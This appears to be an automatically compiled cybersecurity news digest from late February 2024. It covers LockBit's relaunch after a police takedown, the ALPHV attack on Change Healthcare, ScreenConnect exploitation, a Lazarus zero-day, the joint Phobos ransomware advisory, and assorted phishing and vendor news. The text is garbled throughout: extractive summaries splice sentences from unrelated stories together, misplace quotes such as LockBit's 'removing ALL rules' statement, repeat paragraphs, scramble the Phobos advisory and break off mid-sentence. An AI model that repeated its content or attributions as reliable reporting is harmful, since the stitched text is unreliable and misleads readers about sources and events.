Contributors and those who provided new ransomware information and stories this week include: @demonslay335, @Ionut_Ilascu, @Seifreed, @serghei, @fwosar, @BleepinComputer, @malwrhunterteam,@billtoulas, @LawrenceAbrams, @Threatlabz, @DarkWebInformer, @CISAgov, @TrendMicro, @Shadowserver, @a_greenberg, @BrettCallow, @Jon__DiMaggio, @CrowdStrike, @H4ckManac, @RobWright22, @ValeryMarchive, and @pcrisk February 25th 2024 The LockBit gang is relaunching its ransomware operation on a new infrastructure less than a week after law enforcement hacked their servers, and is threatening to focus more of their attacks on the government sector.These incidents targeted municipal and county governments, emergency services, education, public healthcare, and other critical infrastructure entities to successfully ransom several million U.S. dollars This week, the notorious ransomware gang known as LockBit threatened a kind of disruption that would have been a first even for a criminal industry that has crippled hospitals and triggered the shutdown of a gas pipeline: leaking documents from the criminal prosecution of a former president and presidential candidate. February 29th 2024 The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint CSA, to disseminate known TTPs and IOCs associated with the Phobos ransomware variants observed as recently as February 2024, according to open source reporting. "Autosummary:
Exploited in malware attacks since August American-Israeli cybersecurity company Check Point provided more information on this vulnerability last month, saying that Raspberry Robin malware attacks have been exploiting CVE-2023-29360 since August 2023. "Autosummary:
Before it was shut down, for example, Qbot allowed ransomware gangs to seamlessly integrate various attack techniques into their operations, including stealing credentials, moving laterally across networks, and ultimately deploying ransomware or other malicious payloads. After QBot got shut down, there was a vacuum in the ransomware gang tool box—but with PikaBot, that’s beginning to change: last month we wrote about the first recorded instance of PikaBot being used by ransomware gangs, specifically Black Basta, in their attacks. "Autosummary:
Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Guest: Paul Ducklin – @duckblog Episode links: Sponsored by: BlackBerry – BlackBerry helps keeps you one step ahead. "76% of enterprises lack sufficient voice and messaging fraud protection as AI-powered vishing and smishing skyrocket following the launch of ChatGPT, according to Enea. Enterprises report significant losses from mobile fraud 61% of enterprises still suffer significant losses to mobile fraud, with smishing (SMS phishing) and vishing (voice phishing) being the most prevalent and costly. Enterprises account for a significant share of communication service provider (CSP) subscribers and an even greater share of their revenues. … More
The post Vishing, smishing, and phishing attacks skyrocket 1,265% post-ChatGPT appeared first on Help Net Security.
"Autosummary:
CSPs that prioritize security are better positioned to win enterprise business Security leaders, characterized by better capabilities, better funding, and a higher prioritization of security, are less than half as likely as the followers to have a security breach go undetected or unmitigated (12% vs 25%). "Autosummary:
"Autosummary:
UNC5325 abused CVE-2024-21893 to deliver a wide range of new malware called LITTLELAMB.WOOLTEA, PITSTOP, PITDOG, PITJET, and PITHOOK, as well as attempted to maintain persistent access to compromised appliances, Mandiant said. "Autosummary:
Pierluigi Paganini February 29, 2024 February 29, 2024 Experts warn that the LockBit ransomware group has started using updated encryptors in new attacks, after the recent law enforcement operation. "Autosummary:
Lazarus APT exploited zero-day in Windows driver to gain kernel privileges Pierluigi Paganini February 29, 2024 February 29, 2024 North Korea-linked Lazarus APT exploited a zero-day flaw in the Windows AppLocker driver (appid.sys) to gain kernel-level access to target systems. "Autosummary:
After investigation, a few characteristics of the login code made it an interesting attack vector: The code was valid for two hours It did not change during that period when requesting it There was no validation if you attempted a wrong login code Combined with the fact that these codes are only 6 digits, Samip saw opportunities for a brute force attack, where an attacker repeatedly tries to access login credentials in the hope of eventually getting into an account. After uncovering all this information, and with his extensive knowledge about the Facebook authentication process, Samip found the method to take over an account was relatively simple: Pick any Facebook account. "The ALPHV/BlackCat ransomware group has claimed responsibility for the cyberattack that targeted Optum, a subsidiary of UnitedHealth Group (UHG), causing disruption to the Change Healthcare platform and affecting pharmacy transactions across the US. ALPHV/BlackCat is back Last December, US law enforcement successfully shut down the ransomware group’s websites, and the FBI developed a decryption tool. Despite this setback, the group quickly recovered and resumed its activities. On Wednesday, the group published a statement on their … More
The post ALPHV/BlackCat threatens to leak data stolen in Change Healthcare cyberattack appeared first on Help Net Security.
"Autosummary:
"OffSec has released Kali Linux 2024.1, the latest version of its popular penetration testing and digital forensics platform. The new version comes with new tools, a fresh look (themes, wallpapers and icons for Kali and Kali Purple), a new image viewer for the Gnome desktop and a usability enhancement to the Xfce desktop (the ability to copy one’s VPN IP address to the clipboard with just a click), and updates for the Kali NetHunter mobile … More
The post Kali Linux 2024.1 released: New tools, new look, new Kali Nethunter kernels appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
Let"s take a closer look at the trends that are impacting organizations today, including the growing reach of data breaches and the increase in cybersecurity spending, and explore how you can get the most out of your cybersecurity resources, effectively securing your digital assets and maintaining your organization"s integrity in the face of ever-evolving cyber threats. And data breaches can cause real, long-lasting impacts, as proven by some of the most infamous data breaches in history: eBay: Hackers stole login credentials for just a few eBay employees and then pulled off a massive data breach that stole the personal information and passwords of more than 145 million users. "Autosummary:
" Cybersecurity vendor Avast, which discovered an in-the-wild admin-to-kernel exploit for the bug, said the kernel read/write primitive achieved by weaponizing the flaw allowed the Lazarus Group to "perform direct kernel object manipulation in an updated version of their data-only FudModule rootkit. "Autosummary:
API access key Account creation date Email address User IP address Mobile phone number Password and salt used in hashing User type and account status Data breach monitoring and alerting service Have I Been Pwned (HIBP) added the breach to its catalog yesterday, confirming that the leaked dataset includes the information for 19,972,829 people. "Autosummary:
If you would like to book our property, I need to know first some information about you, your name, your country and how many persons will stay with you in our property, also I want you to confirm me your email address. However, the link didn’t point to the real Tripadvisor site, but instead a fake one, which became clear when Malwarebytes Browser Guard popped up a warning advising Stefan not to continue.They replied, asking Stefan to book the property through Tripadvisor because, they said, the Airbnb platform was having some problems and the fees were higher than on Tripadvisor. "Autosummary:
Image "Because of their actions, we are introducing new rules, or rather, we are removing ALL rules, except one, you cannot touch the CIS (critical infrastructure sectors), you can now block hospitals, nuclear power plants, anything, anywhere." "Scammers on Airbnb are faking technical issues and citing higher fees to get users to a spoofed Tripadvisor website and steal their money. The Airbnb scam Malwarebytes researchers came across the Airbnb scam when trying to book an apartment through the platform. The owner/scammer noted in the listing that those interested in booking the property should contact him by email to check for availability. The scammer replies to the victim’s email and tries to get … More
The post Airbnb scammers pose as hosts, redirect users to fake Tripadvisor site appeared first on Help Net Security.
"Autosummary:
(Source: Malwarebytes) To add credibility to the scam, the victim receives another email, ostensibly from Tripadvisor’s platform, urging them to complete the booking by following the shortened URLs in the first email. "Autosummary:
On February 1st, in response to the "substantial threat" and increased risk of security breaches posed by hacked Ivanti VPN appliances, CISA ordered all federal agencies to disconnect all Ivanti Connect Secure and Ivanti Policy Secure instances from their networks within 48 hours, The agencies were mandated to export configurations, factory reset them, rebuild them using patched software versions released by Ivanti, reimport the backed-up configs, and revoke all connected or exposed certificates, keys, and passwords to be able to bring the isolated devices back online. "Autosummary:
Alternatively, users can run the following command through an elevated command prompt as an administrator: net stop w32time & date 03-01-2024 & net start CtxHdxWebSocketService & net start w32time Citrix says its engineering team is working on a fix for the issue so that users won"t have this problem during the next leap year, on February 29th, 2028. - If facing issues, disable SSL/TLS decryption manually; from March 1st, 2024, rebooting servers will address the problem, and settings should be reverted as desired. "Autosummary:
"Autosummary:
"Autosummary:
On February 1st, in response to the "substantial threat" and increased risk of security breaches posed by hacked Ivanti VPN appliances, CISA ordered all federal agencies to disconnect all Ivanti Connect Secure and Ivanti Policy Secure instances from their networks within 48 hours, The agencies were mandated to export configurations, factory reset them, rebuild them using patched software versions released by Ivanti, reimport the backed-up configs, and revoke all connected or exposed certificates, keys, and passwords to be able to bring the isolated devices back online. "Autosummary:
"Autosummary:
"88% of cybersecurity professionals believe that AI will significantly impact their jobs, now or in the near future, and 35% have already witnessed its effects, according to ISC2’s AI study, AI Cyber 2024. Impact of AI on cybersecurity professionals While there is considerable positivity about the role of AI in dealing with cyberattacks, these findings also recognize the urgent demand from professionals for industry preparedness to mitigate cyber risks and safeguard the entire ecosystem. The … More
The post How AI is reshaping the cybersecurity job landscape appeared first on Help Net Security.
"Autosummary:
AI is everywhere, and while the cybersecurity industry was quick to adopt AI and ML as part of its latest generation of defensive and monitoring technologies, so too have the bad actors, who are leaning on the same technology to elevate the sophistication, speed, and accuracy of their own cybercrime activities. "Companies more than ever view GRC (Governance, Risk, and Compliance) as a holistic process and are taking steps toward getting a complete view of their risk environment and compliance obligations, according to Hyperproof. Centralized GRC strategy gains momentum Centralizing strategy, unifying risk and compliance data, and revamping the approach to cybersecurity are becoming more popular strategic objectives among respondents, especially with the rise of AI technology dismantling barriers and fostering collaboration among various GRC functions. … More
The post AI in cybersecurity presents a complex duality appeared first on Help Net Security.
"Autosummary:
Only 19% of respondents manage IT risks in siloed departments, processes, or tools, a 31% decrease from 2023, and 18% of respondents have an integrated view of managing their unique set of risks, an increase of 80% year-over-year. "Autosummary:
"Autosummary:
"Autosummary:
What the ramifications of any stolen data are, remains to be seen, but they could be very serious given the size of the company and the nationwide application of their electronic health record (EHR) systems, payment processing, care coordination, and data analytics.Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.This platform is the largest payment exchange platform between doctors, pharmacies, healthcare providers, and patients in the US healthcare system. "Suspected Chinese state-sponsored hackers leveraging Ivanti Connect Secure VPN flaws to breach a variety of organizations have demonstrated “a nuanced understanding of the appliance”, according to Mandiant incident responders and threat hunters. They were able to perform a number of modifications on the device and deploy specialized malware and plugins aimed at achieving persistence across system upgrades, patches, and factory resets. “While the limited attempts observed to maintain persistence have not been successful to date … More
The post State-sponsored hackers know enterprise VPN appliances inside out appeared first on Help Net Security.
"Autosummary:
In some cases, after exploiting CVE-2024-21893, the attackers used plugins for SparkGateway – a legitimate component of the Ivanti Connect Secure appliance – to modify its configuration file, inject shared objects and re-deploy backdoors after system upgrade events, patches, and factory resets. "Autosummary:
Let"s quickly review what PIM, PAM, and IAM focus on: PIM – management of root user identities and authorizations PAM – management of root user access to critical resources and auditing IAM – management of basic user identities, authorizations, and access to resources Not all digital identities are created equal – superusers need super protection Think about this: Your typical user probably needs access to regular office tools, like your CRM or M365. "Autosummary:
What Organizations Can Do To Limit Phishing Risks In the face of rampant phishing attacks that can cause large-scale data breaches, here are some ways you can limit phishing risks. Theoretical training helps your employees understand different phishing tactics used by attackers, such as email phishing, spear phishing, and whaling. Blink automated workflow: Report on MFA Gaps in Okta How Security Automation Can Help Building automated security workflows limits phishing risks by streamlining incident response. "Autosummary:
Campaign details Savvy Seahorse promotes investment scams with lures written in English, Russian, Polish, Italian, German, French, Spanish, Czech, and Turkish, indicating the threat actor"s global targeting scope. "Pepco Group has confirmed that its Hungarian business has been hit by a “sophisticated fraudulent phishing attack.” The European company, which operates shops under the Pepco, Poundland and Dealz brands, said that the company lost approximately €15.5 million in cash as a consequence of the attack. “It is unclear at this stage whether the funds can be recovered, although Pepco is pursuing various efforts through its banking partners and the police. At this stage, the … More
The post European retailer Pepco loses €15.5 million in phishing (possibly BEC?) attack appeared first on Help Net Security.
"Autosummary:
Pepco says it’s a phishing attack, but it might also be business email compromise “Based on the company statement, it sounds like it has been the victim of a social engineering attack, which led to the accidental transfer of money to fraudsters,” Irene Coyle, chief operating officer at OSP Cyber Academy, told Help Net Security. "Autosummary:
Attack surface management firm Censys said, as of February 27, 2024, it observed no less than 3,400 exposed potentially vulnerable ScreenConnect hosts online, with a majority of them located in the U.S., Canada, the U.K., Australia, Germany, France, India, the Netherlands, Turkey, and Ireland. "Autosummary:
FBI, CISA, HHS warn of targeted ALPHV/Blackcat ransomware attacks against the healthcare sector Pierluigi Paganini February 28, 2024 February 28, 2024 The FBI, CISA, and the Department of HHS warned U.S. healthcare organizations of targeted ALPHV/Blackcat ransomware attacks. "Autosummary:
Lurie Children"s still impaired As per the latest status update from Lurie Children"s on February 22, 2024, effort to restore the IT system is ongoing, and service disruptions still impact some operational segments. "Autosummary:
Below are the four new tools added in Kali 2024.1: blue-hydra - Bluetooth device discovery service opentaxii - TAXII server implementation from EclecticIQ readpe - Command-line tools to manipulate Windows PE files snort - Flexible Network Intrusion Detection System In addition to the new tools, Kali says they upgraded the Kernel version to 6.6. "Autosummary:
"Autosummary:
As part of this operation, law enforcement seized infrastructure, retrieved decryptors, and, in an embarrassing moment for LockBit, converted the ransomware gang"s data leak site into a police press portal. "Autosummary:
Direct syscalls used in the exploit (Avast) The FudModule rootkit, built within the same module as the exploit, executes direct kernel object manipulation (DKOM) operations to turn off security products, hide malicious activities, and maintain persistence on the breached system. "Autosummary:
Threat hunting with ThreatDown MDR How ThreatDown MDR works MSPs continue to be a prime target in cyber attacks—and as we’ve seen in this case study, attackers are in it for the long-haul, able to remain undetected for several months after compromising a network. The attacker’s use of legitimate tools such as TeamViewer, ScreenConnect, and PowerShell, in their months-long attack on the MSP underscores a key theme we’ve been writing about on the blog recently: attackers are increasingly relying on LOTL techniques in their attacks to avoid detection. "Autosummary:
"Autosummary:
“On February 21, 2024, Cencora, Inc. (the “Company”), learned that data from its information systems had been exfiltrated, some of which may contain personal information. "Autosummary:
Optum Solutions, its subsidiary, operates the Change Healthcare platform, the largest payment exchange platform connecting doctors, pharmacies, healthcare providers, and patients in the U.S. healthcare system. "Octopus Deploy announced the acquisition of Codefresh. Codefresh, founded in 2014 by Oleg Verhovsky and Raziel Tabib, is Argo maintainer and leader in Kubernetes CD, GitOps, and CI. The acquisition marks a significant milestone as Octopus strengthens its support for Kubernetes and its commitment to providing powerful continuous delivery platform for virtual machines and cloud-native enterprise-scale applications. The combined business positions Octopus Deploy as one of the largest privately held companies in the DevOps ecosystem. … More
The post Octopus Deploy acquires Codefresh to drive innovation in continuous delivery appeared first on Help Net Security.
"Autosummary:
Octopus and Codefresh offer unparalleled benefits for software teams, including advanced CD, deployment automation, release orchestration, environment progression, observability, and enterprise compliance across all workloads. "In this Help Net Security interview, Kunal Agarwal, CEO at Dope Security, offers a look into the CEO’s leadership philosophy, the process of building a high-caliber team, and the unique challenges of navigating a startup in the tech industry. Dope Security was recently featured in our 10 cybersecurity startups to watch in 2024 roundup. What is your leadership philosophy as a CEO, and how has it evolved since you started the company? I’m a big … More
The post Overcoming the pressures of cybersecurity startup leadership appeared first on Help Net Security.
"Autosummary:
In this Help Net Security interview, Kunal Agarwal, CEO at Dope Security, offers a look into the CEO’s leadership philosophy, the process of building a high-caliber team, and the unique challenges of navigating a startup in the tech industry. Last, relationships are everything – from raising money, hiring your team, building the product, and selling it. Overall, the venture is a different complexity because there’s always that external pressure, high burn rates, and time-to-live. "Autosummary:
It also follows the discovery of a new drainer-as-a-service (DaaS) scheme called CG (short for CryptoGrab) that runs a 10,000-member-strong affiliate program comprised of Russian, English, and Chinese speakers. "Autosummary:
"Autosummary:
The idea behind Android banking trojans—and all cyber trojans—is simple: Much like the fabled “Trojan Horse” which, the story goes, carried a violent surprise for the city of Troy, Android banking trojans can be found on the internet disguised as benign, legitimate mobile apps that, once installed on a device, reveal more sinister intentions.Once installed on a device, “RecoverFiles” asked for access to “photos, videos, music, and audio on this device,” along with extra permissions to access files, map and talk to other apps, and even send payments via Google Play. By masquerading as everyday mobile apps for things like QR code readers, fitness trackers, and productivity or photography tools, Android banking trojans intercept a person’s online interest in one app, and instead deliver a malicious tool that cybercriminals can abuse later on. "Autosummary:
"Autosummary:
"This data leaking can have severe security consequences, especially given the rise of ML systems, where local memory is used to store model inputs, outputs, and weights," security researchers Tyler Sorensen and Heidy Khlaaf said. "Autosummary:
The seizure is the result of a joint operation conducted by international law enforcement agencies from the US, Denmark, Germany, UK, Netherlands, Germany, Australia, Spain, Austria and Europol. BlackCat/ALPHV ransomware gang has been active since November 2021, the list of its victims is long and includes industrial explosives manufacturer SOLAR INDUSTRIES INDIA, the US defense contractor NJVC, gas pipeline Creos Luxembourg S.A., the fashion giant Moncler, the Swissport, NCR, and Western Digital. "Autosummary:
The Hesse Consumer Advice Center is an organization that provides unbiased advice to the residents of Hesse about consumer law, telephone and internet, finance and insurance, energy saving, health and care, food and nutrition. "VIAVI Solutions announced the addition of traffic analysis capabilities to its Observer Sentry Software-as-a-Service-based threat exposure management solution. With traffic visibility, Observer Sentry goes beyond identifying unintended and potentially dangerous exposures, and enables SecOps, DevOps and cloud architects to determine if a vulnerability has been exploited. Observer Sentry audits security groups, access control lists, firewall rules and other sources of configuration to identify resources and relationships across all AWS accounts. This analysis locates the misconfigurations … More
The post VIAVI enhances Observer Sentry’s exposure and vulnerability analysis appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Other notable PhaaS platforms researchers have warned about recently are "Greatness" and "Robin Banks," both launched in mid-2022, featuring MFA bypassing, custom phishing kits, and admin panels. "Autosummary:
ScreenConnect attack flow (Trend Micro) While investigating their attacks, Trend Micro observed reconnaissance, discovery, and privilege escalation activity after the attackers gained access to the network and Black Basta-linked Cobalt Strike beacons being deployed on compromised systems. "Autosummary:
Military Unit 26165 cyberspies, part of Russia"s Main Intelligence Directorate of the General Staff (GRU) and tracked as APT28 and Fancy Bear, are using these hijacked and very popular routers to build extensive botnets that help them steal credentials, collect NTLMv2 digests, and proxy malicious traffic. "Autosummary:
The Hessen Consumer Center is an non-profit organization that aims to provide unbiased and neutral advice to the residents of Hessen about consumer law, telephone and internet, finance and insurance, energy saving, health and care, food and nutrition. "Autosummary:
BlackCat now using ScreenConnect for initial access Today"s advisory comes after the BlackCat ransomware operation was linked to a cyberattack on UnitedHealth Group subsidiary Optum that triggered an ongoing outage impacting Change Healthcare, the largest payment exchange platform connecting doctors, pharmacies, healthcare providers, and patients in the U.S. healthcare system. "Autosummary:
Black Basta and Bl00dy ransomware gangs exploit recent ConnectWise ScreenConnect bugs Pierluigi Paganini February 27, 2024 February 27, 2024 New threat actors have started exploiting ConnectWise ScreenConnect vulnerabilities, including the Black Basta and Bl00dy ransomware gangs. "Autosummary:
"Primary school systems handle sensitive data concerning minors, while higher education institutions must safeguard intellectual property data, making them prime targets for cyberattacks, according to Trustwave. These attacks not only threaten the safety and security of teachers and administrators but also put the privacy of students, staff, and other associated entities at risk. With millions of students now learning through technology in hybrid, remote, or in-class settings, device security is no longer optional. It’s crucial … More
The post Cybersecurity crisis in schools appeared first on Help Net Security.
"Autosummary:
The education sector, like many others, relies heavily on third-party vendors such as software-as-a service, hosting providers, storage, and IT services for various functions, including learning management systems, email, and communication and collaboration tools.Exposed systems & services: Publicly accessible network devices like servers, building management systems, access systems, and cameras lack proper security, increasing risk. "Autosummary:
*when I write the word FBI I mean not only FBI, but also all their assistants, who know how to arrest servers of partners, which act as the first lining after stealing data from the attacked company and do not represent any value: South West Regional Organized Crime Unit in the U.K., Metropolitan Police Service in the U.K., Europol, Gendarmerie-C3N in France, the State Criminal Police Office L-K-A and Federal Criminal Police Office in Germany, Fedpol and Zurich Cantonal Police in Switzerland, the National Police Agency in Japan, the Australian Federal Police in Australia, the Swedish Police Authority in Sweden, the National Bureau of Investigation in Finland, the Royal Canadian Mounted Police in Canada, and the National Police in the Netherlands.A couple of my partners were arrested, to be honest I doubt that very much, they are probably just people who are laundering cryptocurrencies, maybe they were working for some mixers and exchangers with drops, that"s why they were arrested and considered my partners, it would be interesting to see the video of the arrest, where at their homes, Lamborghinis and laptops with evidence of their involvement in our activities, but I somehow think we will not see it, because the FBI arrested random people to get a certificate of merit from the management, say look there are arrests, we are not getting money for nothing, we are honestly working off taxes and imprisoning random people, when real pentesters quietly continue their work.The FBI says they received about 1000 decryptors, a nice figure, but it doesn"t look like the truth, yes they received some unprotected decryptors, those builds of the locker that were made without the "maximum decryptor protection" checkbox could only be received by the FBI in the last 30 days, it"s not known on what day the FBI got access to the server, but we know exactly the date of CVE disclosure and the date when PHP generated an error, before Feb 19th the attacked companies were regularly paying even for unprotected decryptors, so there is a chance the FBI were only on the server for 1 day, it would be nice if the FBI released all the decryptors to the public, then you could trust them that they really own the decryptors, not bluffing and praising their superiority, not the superiority of 1 smart pentester with a public CVE.The FBI designer should work for me, you have good taste, I especially liked the new preloader, in the new update I should do something similar, USA, UK and Europe revolve around my logo, brilliant idea, right there made me feel very good, thanks.Even if you updated your PHP version after reading this information, it will not be enough, because you have to change the hoster, server, all possible passwords, user passwords in the database, audit the source code and migrate everything, there is no guarantee that you have not been hardened on the server.As a result of hacking the servers, the FBI obtained a database, web panel sources, locker stubs that are not source as they claim and a small portion of unprotected decryptors, they claim 1000 decryptors, although there were almost 20000 decryptors on the server, most of which were protected and cannot be used by the FBI. "Autosummary:
"The attackers worked under the guise of a legitimate IT firm Shtazi-IT, which offers services for the development of landing pages, mobile applications, scripts, parsers, and online stores," Russian cybersecurity firm F.A.C.C.T. said. The stolen information included names, dates of birth, Medicare numbers, and sensitive medical information, including records on mental health, sexual health, and drug use. "The recently patched vulnerabilities (CVE-2024-1709, CVE-2024-1708) in ConnectWise ScreenConnect software are being exploited by numerous attackers to deliver a variety of malicious payloads. About ConnectWise ScreenConnect ConnectWise ScreenConnect is a remote desktop solution consisting of server and client elements (applications). The server element is offered as-a-service by ConnectWise or can be installed by customers on their own servers, either on-premises or in the cloud. Client software is installed on workstations and other endpoints, where and … More
The post ScreenConnect flaws exploited to deliver all kinds of malware (CVE-2024-1709, CVE-2024-1708) appeared first on Help Net Security.
"Autosummary:
Sophos’ X-Ops task force says that they spotted attackers deliver two different ransomware variants (both generated by the previously leaked LockBit builder), as well as infostealers, RATs, worms, Cobalt Strike payloads, and additional remote access clients (SimpleHelp, Google Chrome Remote Desktop). "Autosummary:
A majority of the systems used to send phishing messages originate from Brazil, followed by the U.S., Russia, Mexico, Argentina, Ecuador, South Africa, France, Spain, and Bangladesh. "Autosummary:
Reinforce training with powerful password security Specops Password Policy with Breached Password Protection blocks weak passwords from being created and continuously scans your Active Directory passwords against a database of over four billion known compromised passwords. Enforce multi-factor authentication (MFA): MFA adds an extra layer of security by requiring users to provide additional verification, such as a fingerprint scan or a one-time password, in addition to their password. Block weak passwords: Setting up an effective password policy can block common passwords, keyboard walks, and even custom dictionaries specific to your organization"s industry. "Autosummary:
LockBit"s secretive administrator, who uses the online handle "LockBitSupp", acknowledged that the group"s infrastructure was likely compromised by computer crime-fighting authorities due to their failure to patch their PHP version because of "personal negligence and irresponsibility. "NetSTAR announced an advancement in phish detection technology with the introduction of PhishCompass. This innovative AI-supported solution marks a significant milestone in the ongoing battle against phishing threats and attacks, tailored for a wide range of industry sectors including security, networking, cloud services, service providers, and mobile operations. PhishCompass: A real-time phish detection PhishCompass integrates three advanced AI detectors to scrutinize domain strings, HTML content and visual elements, assessing the phishing threat potential of websites. … More
The post NetSTAR PhishCompass combats phishing threats appeared first on Help Net Security.
"Autosummary:
This innovative AI-supported solution marks a significant milestone in the ongoing battle against phishing threats and attacks, tailored for a wide range of industry sectors including security, networking, cloud services, service providers, and mobile operations. "LockBitSupp, the individual running the LockBit ransomware-as-a-service operation, has made good on one promise: the LockBit leak site is back online on backup domains, with lists of victims expected to be unveiled in the coming days. Law enforcement strikes LockBit RaaS gang Last week, Operation Cronos hit LockBit hard by taking over their leak site and affiliate panel, disrupting part of their infrastructure, and arresting some suspected affiliates. It followed up by teasing a reveal … More
The post LockBit leak site is back online appeared first on Help Net Security.
"Autosummary:
"DataVisor launched a solution designed to both detect fraud and financial crimes more effectively and to uphold sponsor bank compliance in the face of evolving regulations for Banking-as-a-Service (BaaS) offerings. As the fintech industry continues to rapidly evolve amidst a rising tide of fraud, sponsor banks not only grapple with the growing issues of increased fraud losses, but also face enormous challenges in maintaining and demonstrating compliance. DataVisor’s solution for sponsor banks replaces ad-hoc detection … More
The post DataVisor introduces fraud and risk solution for financial institutions appeared first on Help Net Security.
"Autosummary:
DataVisor’s solution for sponsor banks replaces ad-hoc detection and compliance methods with comprehensive future-proof technology, including real-time data orchestration, secure multi-tenant infrastructure, and AI-driven analytics. "Autosummary:
In a Twitter thread, g0njxa lists the various organizations targeted by this campaign, primarily targeting educational institutions, such as MIT, Columbia University, Universitat de Barcelona, Auburn University, University of Washington, Purdue, Tulane, Universidad Central del Ecuador, and the University of Hawaiʻi. "Autosummary:
APT29"s initial cloud breach vectors also include the use of stolen access tokens that enable them to hijack accounts without using credentials, compromised residential routers to proxy their malicious activity, MFA fatigue to bypass multi-factor authentication (MFA), and registering their own devices as new devices on the victims" cloud tenants After gaining initial access, SVR hackers use sophisticated tools like the MagicWeb malware (which allows them to authenticate as any user within a compromised network) to evade detection in the victims"s networks, mainly government and critical organizations spanning Europe, the United States, and Asia. "Autosummary:
"Autosummary:
"Autosummary:
A cyber attack hit Thyssenkrupp Automotive Body Solutions business unit Pierluigi Paganini February 26, 2024 February 26, 2024 ThyssenKrupp disclosed a security breach that impacted its automotive division last week, in response to the attack the company shut down IT systems. "Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint CSA, to disseminate known TTPs and IOCs associated with the Phobos ransomware variants observed as recently as February 2024, according to open source reporting. Phobos is structured as a ransomware-as-a-service (RaaS) model. Since May 2019, Phobos ransomware incidents impacting state, local, tribal, and territorial (SLTT) governments have been regularly reported to the MS-ISAC. These incidents targeted municipal and county governments, emergency services, education, public healthcare, and other critical infrastructure entities to successfully ransom several million U.S. dollars.[1],[2]
The FBI, CISA, and the MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of Phobos ransomware and other ransomware incidents.
Download the PDF version of this report:
"Autosummary:
A case of the FAUST Ransomware [12] VirusTotal: Phobos Domain #1 [13] VirusTotal: Phobos executable: Ahpdate.exe [14] VirusTotal: Phobos GUI extension: ELF File [15] VirusTotal: Phobos IP address: 185.202.0[.]111 [16] VirusTotal: Phobos GUI extension: Binary File [17] Cisco Talos GitHub: IOCs/2023/11/deep-dive-into-phobos-ransomware.txt at main REPORTING The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom-note, communications with Phobos actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. [6] Cisco Talos: Understanding the Phobos affiliate structure and activity [7] Cisco Talos: A deep dive into Phobos ransomware, recently deployed by 8Base group [8] Malwarebytes Labs: A deep dive into Phobos ransomware [9] Any Run: Smokeloader [10] Malpedia: Smokeloader [11] In addition, the authoring authorities of this CSA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors: Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, or the cloud). Additional details requested include: a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host and network-based indicators.Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise does not constitute or imply endorsement, recommendation, or favoring by CISA, the FBI, and the MS-ISAC.The Windows command shell enables threat actors to control various aspects of a system, with multiple permission levels required for different subsets of commands [T1059.003][T1105].[8] Smokeloader Deployment Phobos operations feature a standard three phase process to decrypt a payload that allows the threat actors to deploy additional destructive malware.[9] For the first phase, Smokeloader manipulates either VirtualAlloc or VirtualProtect API functions—which opens an entry point, enabling code to be injected into running processes and allowing the malware to evade network defense tools [T1055.002].These tools are all widely accessible and easy to use in various operating environments, making it (and associated variants) a popular choice for many threat actors.[3],[4] Reconnaissance and Initial Access Phobos actors typically gain initial access to vulnerable networks by leveraging phishing campaigns [T1598] to drop hidden payloads or using internet protocol (IP) scanning tools, such as Angry IP Scanner, to search for vulnerable Remote Desktop Protocol (RDP) ports [T1595.001] or by leveraging RDP on Microsoft WindowsSee Figure 2 for a list of email providers used by the following Phobos affiliates: Devos, Eight, Elbie, Eking, and Faust.[6] Figure 1: Phobos Affiliate Providers List INDICATORS OF COMPROMISE (IOCs) See Table 1 through 6 for IOCs obtained from CISA and the FBI investigations from September through November 2023. Overview According to open source reporting, Phobos ransomware is likely connected to numerous variants (including Elking, Eight, Devos, Backmydata, and Faust ransomware) due to similar TTPs observed in Phobos intrusions. The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint CSA, to disseminate known TTPs and IOCs associated with the Phobos ransomware variants observed as recently as February 2024, according to open source reporting.Threat actors leveraging Phobos have notably deployed remote access tools to establish a remote connection within the compromised network [T1219].[7] Alternatively, threat actors send spoofed email attachments [T1566.001] that are embedded with hidden payloads [T1204.002] such as SmokeLoader, a backdoor trojan that is often used in conjunction with Phobos. VALIDATE SECURITY CONTROLS In addition to applying mitigations, the FBI, CISA, and MS-ISAC recommend exercising, testing, and validating your organization"s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, or the cloud). Finally, once Smokeloader reaches its third stage, it unpacks a program-erase cycle from stored memory, which is then sent to be extracted from a SHA 256 hash as a payload.[7] Following successful payload decryption, the threat actors can begin downloading additional malware. RESOURCES REFERENCES [1] Privacy Affairs: “Moral” 8Base Ransomware Targets 2 New Victims [2] VMware: 8base ransomware:A Heavy Hitting Player [3] Infosecurity Magazine: Phobos Ransomware Family Expands With New FAUST Variant [4] The Record: Hospitals offline across Romania following ransomware attack on IT platform [5] The FBI, CISA, and MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the 